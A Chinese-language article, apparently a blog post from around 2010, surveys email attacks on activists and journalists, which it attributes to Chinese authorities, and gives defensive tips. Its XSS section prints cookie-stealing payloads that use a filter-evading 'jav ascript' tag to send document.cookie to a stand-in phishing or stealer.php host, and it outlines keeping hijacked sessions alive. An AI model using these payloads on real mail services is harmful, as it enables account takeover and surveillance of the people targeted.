如果说中国走在网络战争的前沿,你可能觉得胡扯。发动网络战争并不复杂,一般有三种类型:攻击基础设施、窃取机密数据、瘫痪网络服务。而本文,将重点谈及中国窃取机密数据的邮箱情报攻击,几乎从来没有哪个国家能像中国因维稳不惜任何代价而秘密地监听国内外的敏感人士。
对于电子邮箱攻击,你注意到国外媒体批露的中国攻击事件与日俱增,如本月9号,纽约时报记者声称他们的邮箱被攻击,而Twitter上的敏感人士开始越来越多的抱怨。你可能会质疑,有何事实数据可证明他们的邮箱确被攻击?这是一个好问题,因为他们无法跟踪攻击来源与防御被攻击,那么,常见的攻击手法是怎样的?我们如何跟踪攻击来源?又如何防御邮箱间谍的攻击?
一、你是局外人?还是受害者?
1月,Google向中国提出没有审查机制的G.cn, 并声称有人试图入侵中国维权人士的Gmail,14日,McAfee就IE 0day的分析,将此次大规模的窃取机密数据(知识产权)攻击称为极光行动。尽管Google事件余波已去,我想说的是:极光行动为什么没有攻击国内邮 箱?——显然!国内的邮箱具有过滤审查机制,这可以解释你的邮箱为何会丢信,更重要的是,一纸红头文件可未经用户许可泄露邮件数据,若有不从,以涉黄之名拔网线威胁。
普通的用户会这样认为:我不是敏感人士,我不会遭到电邮攻击。这样的想法很美好,让我们谈谈"话语权"吧。在三皇五帝的古代,骂皇帝是要砍头,而40年代末的建国期,是红色的革命语,时间回溯现在的极权主义国家,一切已然不一样了,尽管今天的新闻媒体仍在中宣部的约束之下,但互联网是一次革命,这个开放的网络空间,人人都是媒体,可在Twitter报导新闻,可用Wordpress发出声音,意识形态的大军是无法击溃互联网。
你会不会遭到电邮攻击?与你是不是敏感人士无关,而是视乎你在网络空间的声音、行为,以及现实生活中身份有关系。也不能说所有的电邮攻击都与政府脱不了干系,更有那些充满好奇心、乐于恶作剧的骇客。
二、攻击手法
1、XSS钓鱼
这种攻击仍是目前最行之有效的方法,除了Gmail目前不存在XSS漏洞外,其它的Yahoo、Hotmail、网易、腾讯、搜狐、新浪等都存在XSS漏洞。XSS漏洞是啥?它的全称是Cross-site scripting,即跨站攻击,存在此漏洞的网站,能够被恶意攻击者劫持,它还派生了XSRF等等形式的利用,可谓Web木马。
08年,国内的邮箱都存在HTML标签跨站,漏洞都很弱智,比如<img src=javascript:alert()>插 在邮件标题、邮件内容、邮件附件处即可弹出一个可爱的alert。接下来,进步一点了,还是以HTML标签为主,搞个数据包工具看哪个变量没过滤、以及编 码转换。09年,又升级了,主要是国外的邮箱Gmail、Yahoo、Hotmail改以语法过滤,能利用的是CSS标签跨站,Gmail非常狠,除了早 期存在Google Docs附件跨站攻击,基本把恶意代码过滤得惨不忍睹。Yahoo在09年亦漏洞不断,但很负责,隔三差五地不断升级,而Hotmail令人失望,居然 1day过了一年都不补。
腾讯圈了一批牛人,忘记是Ph4nt0m还是80sec的, 比其它的网易、搜狐、新浪的邮箱安全性好一点,搜狐与新浪最烂,透露一下,它们其中一个仍存在字符集的跨站漏洞。那么,XSS攻击到底是怎样的形式呢?用 一个08年截获的新浪的HTML标签XSS漏洞说明,此漏洞是失效了,这年头基本没人直接公开0day,都养家糊口来着。
<INPUT TYPE="IMAGE" SRC="jav ascript:x7s='var Then=new Date();Then.setTime(Then.getTime()+7200*1000);if(document.cookie. indexOf(\'Cookie1=\') == -1){document.cookie=\'Cookie1=RAY;expires=\'+Then.toGMTString();window.parent.location.href=\'http://www.google.com/sina/index.php?url=\'+location.href+\'&c=\'+document.cookie.replace(/&/g,\'xxx\');}';eval(x7s)");">
此漏洞的形成在于新浪邮箱没有过滤空格,即过滤了javascript,但稍变形为jav ascript,便使得其后的恶意代码得以执行。这段代码有两个功能,获取Cookie并延长有效时间,并用父窗口 windows.parent.location重定向至钓鱼网站。完整的攻击流程是,将上述XSS代码插入至邮件内容,以HTML模式发送邮件至受害者 邮箱,受害者点开邮件时,会迅速转向sina钓鱼网站,而转向过程中,因采用parent,转向时,网址不会有变化,即不会显示钓鱼网址,而受害者在钓鱼 网站输入密码提交之,钓鱼网站截取密码再转回真实的邮箱,由于控制了Cookie,受害者因怀疑会再次点开那封攻击邮件,但并不会再次跳转,这令受害者产 生一种错觉,它以为邮箱仍是安全的。
2、窃取Cookie
你可以理解为窃取会话。你有过很多这样的经历,使用账户登陆某个网站,如Youku.com,关闭浏览器,再次打开youku.com,则不需要输入密码,这便是Cookie的 作用。为什么会有Cookie呢?由于Http是无状态协议,为了在各个会话传递信息,因而需要Cookie或Session来标记访客者的状态,这里的 Session是浏览器的Cookie里带了一个Token来标记,而服务器取得Token检查合性后便把服务器上存储的对应状态和浏览器绑定。总的意思 就是:我只要窃取你的Cookie并保持了Session不过期,便可无须密码访问你的电子邮箱内容。
如果你要查看自己的Cookie,给Firefox装个HttpFox扩展即可,如下图。
窃取Cookie很简单,可将上面的Javascript稍加改装即可:<INPUT TYPE="IMAGE" SRC="jav ascript:document.location='http://www.google.com/cookie /stealer.php?cookie='+document.cookie;">,然后在stealer.php写个保存接收的Cookie记 录的代码即可,如果你想让Session不过期,自己写个工具搞惦,每隔30秒请求一次目的页面。09年,Yahoo就被一帮人折腾了很多邮箱,不知道修 复了没有,国内几个邮箱也能被利用。
3、恶意软件
即木马、病毒、后门、间谍、键盘记录器……这些软件,最常见算是doc、pdf病毒了,好好的一个文档,挟带了木马,双击一打开,你就完了。最容易 受到攻击的是西藏人士、维权人士,然而,我不得不承认,这是一种非常阴险的手段,因为这毫无任何技术含量。这个攻击流程是,xxx部门获取经费收购或买断 木马软件、捆绑软件,一般外包给中国公司,然后这些公司的报价奇高,各省xxx部门买了后,按照说明书配置木马上线,再用捆绑工具与可信的文件捆在一起, 再用Google挑目标,比如找到abc.com网站,将该网站电子邮箱地址都整理出来,再用邮箱批量群发器不管三七十一把这些病毒通通发过去,再泡上一 杯茶盯着木马软件等着目标上线。
这种没有采用鱼叉式攻击所导致的后果是,买的木马软件、捆绑软件很快就无效了,因为一顿乱发,被安全软件给盯上或用户举报查杀掉了,这个例证就是最近的IE 0day及PDF 0day很快曝光,估计这前后都不到一年。而在前文,尽管中国没有比美国更好的网络战争实力,但是不差钱,他们不需要关注技术细节,只需要知道谁有0day,谁会挖掘0day,然后招安,买断一堆的0day,比如Discuz!、Wordpress、Firefox漏洞,照着教程去攻击。
那么如何防御这种恶意附件的攻击?当你再次在邮箱看见一堆的PDF、DOC、HTM压缩包时,简单的方法是,下载后不要打开,直接上传至Google Docs,要是显示一片空白或无关的内容,不管三七二十一提交到VirusTotal网站上。
4、社会工程学
这个方法很简单,先跟你套近乎下,然后东问问西问问获得碎片信息,基本就是掘地三层把目标的信息全收集起来,完了后,评估一下你的弱点在哪里,再从 弱点入手,这种攻击通常是雇佣了职业黑客来完成,因为过程比较复杂。举例子,攻击者有目标的邮箱,然后放到Google搜索,看目标注册了哪些网站,把这 些网站整理,逐个把这些网站入侵了并下载数据库,从中找到目标的网站密码,再用网站密码试邮箱密码,要是目标只用一个密码,那么他的邮箱就完了。
总体上来说,你在网络上的信息越少,便能够降低被入侵的威胁。但事实并不情人愿,Web2.0的社交网络流行,你注册了Twitter,天天叽叽喳 喳,一不小心把家世、住址、约会全都泄露了,你注册了豆瓣,天天左看右瞧还加了攻击者为好友,结果,他就知道你上网习惯与兴趣爱好,然后再用策略和你聊的 特别欢,某一天,他跟你讲:我找到一个非常牛B的电影了,你在Verycd下载瞧瞧。你一看,还真不错,真是你喜欢的。然后他又讲,能不能帮我登陆下 Gmail下载个文件看看是啥内容?我网速比较慢,我发你登陆密码。你听了,这小忙是得帮的,马上速度登陆对方的Gmail下载了压缩包,结果打开压缩包 的文档发现啥都没,到了第二天,你就很神奇地发现,哦哦~我的豆瓣、twitter全都登陆不了……
社会工程学攻击永不过时,因为人人都有被利用的心理弱点,不管是好心、私心、同情心啥的,都无法避免这种攻击。不过,这项攻击最大的缺点是,很耗时 间,短则几天,长则几月。这项攻击在敏感人士的社区很常见,如Forum、Google Groups等,那些攻击者最常见的手法盗用可信账户发送病毒附件。
5、MIT中间人攻击
以ARP攻击为例,A访问mail.sina.com,但攻击者B通过ARP劫持,可以使得你访问虚假的新浪钓鱼网站,而非真实的新浪。这种劫持通 信的手法可适合不同的场合,如劫持ADSL线路,这需要红头文件请本地电信局协助的,然后修改你的数据包返回假的数据包,举例而言,你想从QQ官方下载 QQ程序,攻击者修改数据包把QQ程序的下载地址改成木马地址,结果你就可以下载个木马回去了。如果你的通信是明文,没有采用SSL,攻击者可以直接看到 你密码。不过,我不太肯定,Gmail虽然采用了SSL,但用户名与密码却在网址中出现,有公司宣称能解开SSL,我现在仍然是半信半疑。
另外一种是hosts文件劫持,典型的例子是,某个家伙在Twitter.com说:无法访问youtube.com?Picasaweb?很简 单,修改hosts文件即可马上访问。你一听,哇,这么好,赶紧用记事本打开hosts文件,把对方提供的映射地址粘贴进去,再重新打开 youtube.com,哇,真神奇,打开了~~聪明的看客接下来知道会发生啥了。
对于ADSL线路劫持的手法,这种攻击也是行之有效的。另外,我们也得对某些代理软件保持警惕,天知道那些免费的socks5、vpn会干出令人震惊的事吗?
6、暴力破解
有三种,web穷举、smtp穷举、云穷举。在多数的情况下,前两种效率低下,且限制诸多,以Web Gmail为例,它有CAPTCHA限制、重复次数的限制,不过,我倒是碰到过一个Python版的穷举工具,但速度很慢。至于smtp,如果服务器做了 限制的话,比如现在网易对溯雪暴力破解工具是免疫的。云穷举,就我目前所知,我想这是最有效率的破解方法,已有安全专家Electric Alchemy利用亚马逊云服务Amazon Ec2运行Elcomsoft工具暴力破解PGP ZIP档案的例子。凭借云计算的超级计算机,以及一个分布式邮箱密码破解工具,暴力破解的速度将更快速。不过,这并不切实际,因为破解的成本太高了,需要很多米米。
暴力破解,这个古老的方法在目前只能针对极少的主流电子邮箱,尽管如此,但它对那些自架设的电子邮局仍然有效,因为它们没有CAPTCHA、重复尝 试次数、服务器资源等限制。总的来说,暴力破解对本地的加密文件破解比较有效率,但对网络邮箱账户的破解尚不能达到30%的成功率。
7、浏览器恶意脚本
8、内嵌登陆表单
这是社会工程学攻击的一种变形。当你打开某邮件,其内容部分嵌入了登陆表单,具体就是,你会看到一个要求你输入用户名、密码的登陆框。恰好RFA的新闻《维权人士邮箱和推特遭窃取、攻击》公布一张攻击实例图片,见下图。
如果你的Gmail收到上述的威胁恫吓邮件,不要担心,请在邮件的右侧点击下拉菜单,选择"这是网络欺诈",而Gmail将会稍后封锁此攻击者。普 通的用户不要误以为这是Gmail的安全漏洞,最简单的方法,选中邮件内容查看源代码,你可以发现并不存在恶意的Javascript脚本,而是HTML 标签,你在源代码找到Action位置,将其后的钓鱼网站向Google举报即可。
其它的Gmail用户不需要担心,这种内嵌表单钓鱼方式是通杀Gmail、Hotmail、Yahoo、网易、腾讯、搜狐的邮箱,由于不存在恶意的 Javascript,可称之良性HTML标签利用。看到这类威胁恫吓邮件,一是举报钓鱼邮件、钓鱼网址,二是删除该邮件,三是提醒你的朋友警惕。
三、防御
1、防御XSS
2、防御恶意软件
3、防御身份盗窃
4、防御数据失窃
5、防御身份泄密
6、使用Chrome浏览器
7、使用Gmail
8、每月密码老化
四、反跟踪
1、阻止邮件中的媒体
如果你不想攻击者获取到你的IP地址、浏览器、操作系统等信息,你应该阻止邮件中图片显示。这是为什么?显示图片则意味着你访问了该图片的服务器, 而该服务器则记录了你的访问数据。如果你已经安装了IIS、Apache,那么你可以打开http://localhost,再去查看它们的日志信息,看 看到底有没有记录你的访问信息。
而如果你没有装上IIS、Apache无法测试的话,你可以打开间谍猪:http://www.spypig.com/ 向自己的邮箱发送测试邮件。如果你使用的Gmail,那非常好,Gmail默认是阻止图片显示的。
